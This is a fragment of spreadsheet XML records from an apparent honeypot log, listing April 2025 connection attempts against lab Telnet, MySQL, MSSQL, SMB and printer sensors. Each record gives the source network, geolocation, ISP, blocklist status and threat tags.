    <s v="Telecom Personal Bs"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b566:68a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3287"/>
    <x v="3287"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:51:52"/>
    <d v="2025-04-03T17:47:01"/>
    <d v="2025-04-03T17:51:52"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="09"/>
    <s v="Jazan Region"/>
    <s v="NA"/>
    <s v="Mizhirah"/>
    <s v="410874"/>
    <s v="NA"/>
    <s v="16.8261"/>
    <s v="42.7333"/>
    <s v="35819"/>
    <s v="Etihad Etisalat, a joint stock company"/>
    <s v="Internet Broadband"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2012-04-16"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25f3:f8ed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3288"/>
    <x v="3288"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:29:58"/>
    <d v="2025-04-03T17:29:58"/>
    <d v="2025-04-03T17:29:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:fe3b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3289"/>
    <x v="3289"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:26:59"/>
    <d v="2025-04-03T17:26:59"/>
    <d v="2025-04-03T17:26:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13725"/>
    <s v="101.693"/>
    <s v="4788"/>
    <s v="TTSSB-MY"/>
    <s v="Tm Technology Services Sdn Bhd"/>
    <s v="consumer"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e9f:97d7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3290"/>
    <x v="3290"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:19:24"/>
    <d v="2025-04-02T19:44:22"/>
    <d v="2025-04-03T17:19:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Sonoma"/>
    <s v="Windsor"/>
    <s v="5410004"/>
    <s v="95492"/>
    <s v="38.5471"/>
    <s v="-122.816"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="None"/>
    <s v="COMCAST-VOIP-4"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:622d:e83"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3291"/>
    <x v="3291"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:14:44"/>
    <d v="2025-04-03T17:14:44"/>
    <d v="2025-04-03T17:14:44"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:7c73"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3292"/>
    <x v="3292"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:09:43"/>
    <d v="2025-04-03T17:06:48"/>
    <d v="2025-04-03T17:09:43"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:b078"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3293"/>
    <x v="3293"/>
    <s v="host81-149-118-126.in-addr.btopenworld.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:07:18"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T17:07:18"/>
    <n v="228"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22828&amp;&amp;23&amp;&amp;NA&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="West Northamptonshire"/>
    <s v="Northampton"/>
    <s v="2641430"/>
    <s v="NA"/>
    <s v="52.25"/>
    <s v="-0.8833300000000001"/>
    <s v="2856"/>
    <s v="British Telecommunications PLC"/>
    <s v="BT Public Internet Service"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-03-20 19:04:30"/>
    <s v="2026-03-20 18:04:30"/>
    <s v="2025-03-05 10:08:38"/>
    <s v="['DYDNS0.BT.COM', 'DYDNS1.BT.COM', 'EDDNS0.BT.COM', 'EDDNS1.BT.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:5195:767e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3294"/>
    <x v="3294"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:05:41"/>
    <d v="2025-04-03T16:57:27"/>
    <d v="2025-04-03T17:05:41"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:c222"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3295"/>
    <x v="3295"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T16:50:13"/>
    <d v="2024-09-08T08:32:00"/>
    <d v="2025-04-03T16:50:13"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_DHCP_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:6f3a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3296"/>
    <x v="3296"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T16:38:15"/>
    <d v="2024-11-25T01:29:26"/>
    <d v="2025-04-03T16:38:15"/>
    <n v="68"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="1433&amp;&amp;445&amp;&amp;56314"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Dhaka"/>
    <s v="1185241"/>
    <s v="NA"/>
    <s v="23.7104"/>
    <s v="90.4074"/>
    <s v="23688"/>
    <s v="Link3 Technologies Limited"/>
    <s v="Link3 Technologies Limited"/>
    <s v="business"/>
    <s v="Corporate Subscriber"/>
    <s v="2010-03-31"/>
    <s v="Corporate-Subscriber"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b93:db3a"/>
    <s v="None"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3297"/>
    <x v="3297"/>
    <s v="NA&amp;&amp;1-172-6-127.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T16:16:29"/>
    <d v="2025-04-03T16:05:21"/>
    <d v="2025-04-03T16:16:29"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Penghu County"/>
    <s v="Magong"/>
    <s v="1672228"/>
    <s v="NA"/>
    <s v="23.5654"/>
    <s v="119.586"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:1ac:67f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3298"/>
    <x v="3298"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T16:14:40"/>
    <d v="2023-12-18T00:00:59"/>
    <d v="2025-04-03T16:14:40"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="45298&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (MLA Colony)"/>
    <s v="1269843"/>
    <s v="500001"/>
    <s v="17.4061"/>
    <s v="78.4312"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS AP"/>
    <s v="2006-12-19"/>
    <s v="ABTS-AP-DSL-122892-hyd"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa9:fd90"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3299"/>
    <x v="3299"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T16:02:12"/>
    <d v="2025-04-03T02:48:18"/>
    <d v="2025-04-03T16:02:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="11680-000"/>
    <s v="-23.4338"/>
    <s v="-45.086"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b0fc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3300"/>
    <x v="3300"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:57:31"/>
    <d v="2025-04-03T15:57:31"/>
    <d v="2025-04-03T15:57:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:832a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3301"/>
    <x v="3301"/>
    <s v="220-137-214-100.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T15:29:51"/>
    <d v="2025-04-03T15:29:51"/>
    <d v="2025-04-03T15:29:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_PJL_HC1"/>
    <s v="9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_PJL: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dc89:d664"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3302"/>
    <x v="3302"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:26:33"/>
    <d v="2025-04-03T15:26:33"/>
    <d v="2025-04-03T15:26:33"/>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3d01:3f5e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3303"/>
    <x v="3303"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:25:13"/>
    <d v="2025-04-03T15:25:13"/>
    <d v="2025-04-03T15:25:13"/>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3d02:5e79"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3304"/>
    <x v="3304"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:22:08"/>
    <d v="2025-04-03T15:22:08"/>
    <d v="2025-04-03T15:22:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
